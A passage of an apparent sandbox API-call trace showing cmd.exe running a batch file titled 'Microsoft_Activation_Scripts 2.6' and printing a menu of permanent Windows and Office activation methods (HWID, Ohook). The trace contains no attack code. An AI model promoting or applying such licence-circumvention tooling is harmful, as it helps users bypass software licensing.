"c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.835] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.835] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.835] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2490 [0180.836] GetProcessHeap () returned 0x19a8f1e0000 [0180.836] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0180.836] GetProcessHeap () returned 0x19a8f1e0000 [0180.837] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f95e0) returned 1 [0180.837] GetProcessHeap () returned 0x19a8f1e0000 [0180.838] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf40) returned 1 [0180.838] GetProcessHeap () returned 0x19a8f1e0000 [0180.838] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0180.838] GetProcessHeap () returned 0x19a8f1e0000 [0180.838] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0180.838] GetProcessHeap () returned 0x19a8f1e0000 [0180.838] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0180.839] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2490 [0180.839] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9367, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2497 [0180.839] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n Activation Methods:\r\n_______________________________\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 7 [0180.839] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.839] GetFileType (hFile=0xa0) returned 0x1 [0180.839] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2497 [0180.839] GetProcessHeap () returned 0x19a8f1e0000 [0180.839] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.840] GetProcessHeap () returned 0x19a8f1e0000 [0180.841] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.841] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.841] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.841] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.841] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.841] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.841] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.841] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.841] GetProcessHeap () returned 0x19a8f1e0000 [0180.841] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0180.842] GetProcessHeap () returned 0x19a8f1e0000 [0180.842] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0180.842] _tell (_FileHandle=3) returned 9367 [0180.842] _close (_FileHandle=3) returned 0 [0180.842] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.842] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.842] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.842] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.842] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.842] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.842] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.842] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.842] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.842] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.842] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.842] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.842] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.842] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.843] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.843] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.843] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.843] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.843] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.843] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.843] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.843] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.843] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.843] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.843] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.843] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.843] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.843] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.843] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.843] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.843] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.843] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.843] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.843] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.843] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.843] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.843] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.843] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.843] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.843] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.844] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.844] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.844] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.844] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.844] GetLastError () returned 0x7b [0180.844] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.844] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.844] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.845] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.845] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.845] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.845] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.845] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.845] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.845] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.845] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.845] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.845] GetProcessHeap () returned 0x19a8f1e0000 [0180.845] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.845] GetProcessHeap () returned 0x19a8f1e0000 [0180.845] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec680 [0180.845] GetProcessHeap () returned 0x19a8f1e0000 [0180.845] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ec680, Size=0x16) returned 0x19a8f1ec980 [0180.845] GetProcessHeap () returned 0x19a8f1e0000 [0180.845] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec980) returned 0x16 [0180.845] GetProcessHeap () returned 0x19a8f1e0000 [0180.845] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb740 [0180.845] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer="\r\n") returned 2 [0180.845] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.845] GetFileType (hFile=0x24) returned 0x2 [0180.845] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.845] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.846] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.846] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x2) returned 1 [0180.849] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.849] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.850] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.850] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.850] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.850] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.850] SetConsoleInputExeNameW () returned 0x1 [0180.851] GetConsoleOutputCP () returned 0x1b5 [0180.851] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.851] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.851] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.852] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.852] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.852] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9367, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2497 [0180.852] GetProcessHeap () returned 0x19a8f1e0000 [0180.852] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0180.852] GetProcessHeap () returned 0x19a8f1e0000 [0180.852] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec980) returned 1 [0180.852] GetProcessHeap () returned 0x19a8f1e0000 [0180.852] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.852] GetProcessHeap () returned 0x19a8f1e0000 [0180.852] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0180.852] GetProcessHeap () returned 0x19a8f1e0000 [0180.853] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0180.853] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.853] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2497 [0180.853] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.853] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9439, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24df [0180.853] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [1] HWID ^| Windows ^| Permanent\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: [1] HWID ^| Windows ^| Permanent\r\n__\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 72 [0180.853] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.853] GetFileType (hFile=0xa0) returned 0x1 [0180.853] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.853] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24df [0180.853] GetProcessHeap () returned 0x19a8f1e0000 [0180.854] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.854] GetProcessHeap () returned 0x19a8f1e0000 [0180.855] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.855] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.855] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.855] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.855] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.855] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.855] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.855] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.855] GetProcessHeap () returned 0x19a8f1e0000 [0180.855] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0180.855] GetProcessHeap () returned 0x19a8f1e0000 [0180.855] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.855] GetProcessHeap () returned 0x19a8f1e0000 [0180.855] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x90) returned 0x19a8f2026a0 [0180.856] _tell (_FileHandle=3) returned 9439 [0180.856] _close (_FileHandle=3) returned 0 [0180.856] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.856] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.856] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.856] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.856] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.856] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.856] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.856] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.856] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.856] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.856] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.856] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.856] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.856] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.856] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.856] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.856] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.856] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.856] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.856] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.857] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.857] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.857] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.857] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.857] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.857] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.857] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.857] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.857] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.857] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.857] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.857] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.857] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.857] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.857] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.857] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.857] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.857] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.857] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.857] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.857] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.857] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.857] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.857] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.858] GetLastError () returned 0x7b [0180.858] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.858] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.858] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.858] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.858] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.858] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.858] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.858] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.858] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.858] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.859] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.859] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.859] GetProcessHeap () returned 0x19a8f1e0000 [0180.859] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9a) returned 0x19a8f200660 [0180.859] GetProcessHeap () returned 0x19a8f1e0000 [0180.859] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x114) returned 0x19a8f1ea8b0 [0180.859] GetProcessHeap () returned 0x19a8f1e0000 [0180.859] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x54) returned 0x19a8f1ea8b0 [0180.859] GetProcessHeap () returned 0x19a8f1e0000 [0180.859] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x54 [0180.859] GetProcessHeap () returned 0x19a8f1e0000 [0180.859] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9c) returned 0x19a8f200be0 [0180.859] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" [1] HWID | Windows | Permanent\r\n") returned 65 [0180.859] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.859] GetFileType (hFile=0x24) returned 0x2 [0180.859] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.859] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.860] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.860] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x41) returned 1 [0180.864] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.864] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.864] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.864] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.865] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.865] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.865] SetConsoleInputExeNameW () returned 0x1 [0180.865] GetConsoleOutputCP () returned 0x1b5 [0180.865] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.866] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.866] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.866] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.866] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.866] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9439, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24df [0180.866] GetProcessHeap () returned 0x19a8f1e0000 [0180.867] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200be0) returned 1 [0180.867] GetProcessHeap () returned 0x19a8f1e0000 [0180.867] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0180.867] GetProcessHeap () returned 0x19a8f1e0000 [0180.868] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200660) returned 1 [0180.868] GetProcessHeap () returned 0x19a8f1e0000 [0180.868] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2026a0) returned 1 [0180.868] GetProcessHeap () returned 0x19a8f1e0000 [0180.868] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.868] GetProcessHeap () returned 0x19a8f1e0000 [0180.869] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0180.869] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.869] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24df [0180.869] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.869] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9511, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2527 [0180.869] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [2] Ohook ^| Office ^| Permanent\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: [2] Ohook ^| Office ^| Permanent\r\n__\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 72 [0180.869] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.869] GetFileType (hFile=0xa0) returned 0x1 [0180.869] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.869] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2527 [0180.869] GetProcessHeap () returned 0x19a8f1e0000 [0180.870] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.870] GetProcessHeap () returned 0x19a8f1e0000 [0180.870] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.870] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.870] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.870] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.870] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.870] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.870] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.870] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.870] GetProcessHeap () returned 0x19a8f1e0000 [0180.871] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0180.871] GetProcessHeap () returned 0x19a8f1e0000 [0180.871] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb950 [0180.871] GetProcessHeap () returned 0x19a8f1e0000 [0180.871] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x90) returned 0x19a8f202420 [0180.871] _tell (_FileHandle=3) returned 9511 [0180.871] _close (_FileHandle=3) returned 0 [0180.871] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.871] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.871] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.871] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.871] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.871] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.871] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.871] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.871] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.871] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.872] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.872] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.872] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.872] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.872] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.872] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.872] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.872] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.872] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.872] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.872] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.872] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.872] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.872] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.872] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.872] 